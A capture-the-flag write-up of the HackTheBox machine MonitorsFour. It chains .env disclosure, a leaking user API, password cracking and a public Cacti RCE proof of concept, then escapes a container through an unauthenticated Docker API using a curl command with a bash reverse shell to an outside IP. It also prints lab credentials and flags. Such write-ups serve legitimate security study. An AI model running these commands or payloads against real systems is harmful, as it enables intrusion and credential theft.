Post

HTB MonitorsFour WriteUp

Posted Updated
Preview Image
By Rohit Anand
4 min read
HTB MonitorsFour WriteUp

Author: r0h1tAnand

Enumeration

Nikto

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

❯ nikto -h http://monitorsfour.htb/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.11.98
+ Target Hostname:    monitorsfour.htb
+ Target Port:        80
+ Start Time:         2026-01-02 22:50:09 (GMT5.5)
---------------------------------------------------------------------------
+ Server: nginx
+ /: Retrieved x-powered-by header: PHP/8.3.27.
+ /: The anti-clickjacking X-Frame-Options header is not present.
+ /: The X-Content-Type-Options header is not set.
+ /: Cookie PHPSESSID created without the httponly flag.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 17 error(s) and 4 item(s) reported on remote host
+ End Time:           2026-01-02 23:01:50 (GMT5.5) (701 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

RustScan

1
2
3
4
5
6
7

cat rustscan.txt
Open 10.10.11.98:80
Open 10.10.11.98:5985
Nmap scan report for Monitorfour.htb (10.10.11.98)
PORT     STATE SERVICE REASON
80/tcp   open  http    syn-ack ttl 127
5985/tcp open  wsman   syn-ack ttl 127

Nmap

1
2
3
4
5
6
7
8

cat nmap.txt
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-02 22:35 +0530
Nmap scan report for monitorfour.htb (10.10.11.98)
Host is up (0.16s latency).
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0

Feroxbuster

Feroxbuster enumerated static assets, admin assets and discovered login, forgot-password, user, and many /static/... resources.

Nuclei

Nuclei found potential .env disclosure templates matching /.env paths.

Exploitation

Retrieving .env

The .env was accessible:

1
2
3
4
5
6

❯ curl http://monitorsfour.htb/.env
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r

These database credentials indicated a backend DB service and possible info disclosure vectors.

Subdomain discovery

A virtual-host brute force discovered cacti.monitorsfour.htb (via ffuf).

User enumeration API

The user endpoint revealed account records (IDs, usernames, password hashes, tokens):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55

❯ curl http://monitorsfour.htb/user?token=0 | jq
[
	{
		"id": 2,
		"username": "admin",
		"email": "admin@monitorsfour.htb",
		"password": "56b32eb43e6f15395f6c46c1c9e1cd36",
		"role": "super user",
		"token": "8024b78f83f102da4f",
		"name": "Marcus Higgins",
		"position": "System Administrator",
		"dob": "1978-04-26",
		"start_date": "2021-01-12",
		"salary": "320800.00"
	},
	{
		"id": 5,
		"username": "mwatson",
		"email": "mwatson@monitorsfour.htb",
		"password": "69196959c16b26ef00b77d82cf6eb169",
		"role": "user",
		"token": "0e543210987654321",
		"name": "Michael Watson",
		"position": "Website Administrator",
		"dob": "1985-02-15",
		"start_date": "2021-05-11",
		"salary": "75000.00"
	},
	{
		"id": 6,
		"username": "janderson",
		"email": "janderson@monitorsfour.htb",
		"password": "2a22dcf99190c322d974c8df5ba3256b",
		"role": "user",
		"token": "0e999999999999999",
		"name": "Jennifer Anderson",
		"position": "Network Engineer",
		"dob": "1990-07-16",
		"start_date": "2021-06-20",
		"salary": "68000.00"
	},
	{
		"id": 7,
		"username": "dthompson",
		"email": "dthompson@monitorsfour.htb",
		"password": "8d4a7e7fd08555133e056d9aacb1e519",
		"role": "user",
		"token": "0e111111111111111",
		"name": "David Thompson",
		"position": "Database Manager",
		"dob": "1982-11-23",
		"start_date": "2022-09-15",
		"salary": "83000.00"
	}
]

The admin user’s hash 56b32eb43e6f15395f6c46c1c9e1cd36 cracked (via CrackStation) to wonderful1.

Cacti (cacti.monitorsfour.htb) — RCE

The cacti subdomain hosted a vulnerable Cacti instance. Using a public PoC for CVE-2025-24367, an authenticated exploit was run against the instance.

Steps taken:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC.git
cd CVE-2025-24367-Cacti-PoC
sudo python3 exploit.py -url http://cacti.monitorsfour.htb -u marcus -p wonderful1 -i 10.10.1

# Output excerpts:
[+] Cacti Instance Found!
[+] Serving HTTP on port 80
[+] Login Successful!
[+] Got graph ID: 226
[i] Created PHP filename: QIrLq.php
[+] Got payload: /bash
[i] Created PHP filename: nEB9f.php
[+] Hit timeout, looks good for shell, check your listener!
[+] Stopped HTTP server on port 80

A webshell/reverse shell was obtained as www-data inside the Cacti container/instance.

Privilege Escalation — User Flag

From the webshell:

1
2

www-data@821fbd6a43fa:/home/marcus$ cat user.txt
b19adbc0656973ccbc9501eff00564e9

The environment indicated a container (presence of /.dockerenv).

Privilege Escalation — Root

The container had access to the Docker daemon on the host via the Docker socket at 192.168.65.7:2375. Using the unauthenticated Docker API, a new container was created and started, mounting the host filesystem:

1
2
3
4
5
6
7
8
9
10
11
12
13

# Create container with bind mount to expose host filesystem
curl -X POST -H "Content-Type: application/json" \
	http://192.168.65.7:2375/containers/create \
	-d '{
		"Image": "docker_setup-nginx-php:latest",
		"Cmd": ["/bin/bash", "-c", "bash -i >& /dev/tcp/10.10.15.179/9000 0>&1"],
		"HostConfig": {
			"Binds": ["/mnt/host/c:/host_root"]
		}
}'

# Start the created container
curl -X POST http://192.168.65.7:2375/containers/<container_id>/start

After starting the container and catching the reverse shell listener, an interactive root shell on the host was available. The attacker inspected the mounted host filesystem and read the Administrator root flag:

1
2
3
4

root@ce1622d49bf1:/home/marcus# ls -la /host_root
# (mounted Windows host filesystem)
root@ce1622d49bf1:/home/marcus# cat /host_root/Users/Administrator/Desktop/root.txt
002402adad2f66260505d18e1c907b7a

Flags

  • User flag: b19adbc0656973ccbc9501eff00564e9
  • Root flag: 002402adad2f66260505d18e1c907b7a

Notes

  • The attack chain used: .env disclosure → user enumeration → password cracking → subdomain discovery (cacti) → authenticated Cacti RCE PoC → container escape via exposed Docker API → host filesystem access → root flag.
  • Presence of exposed Docker daemon without authentication is highly dangerous — it allows mounting host paths and starting privileged containers.

If you need clarification or help reproducing any step, search for ‘fetch_webpage’ and #codebase.

Author: Sierra0117

HackTheBox, Writeups, Machines
htb privilege-escalation Linux windows docker cacti
This post is licensed under CC BY 4.0 by the author.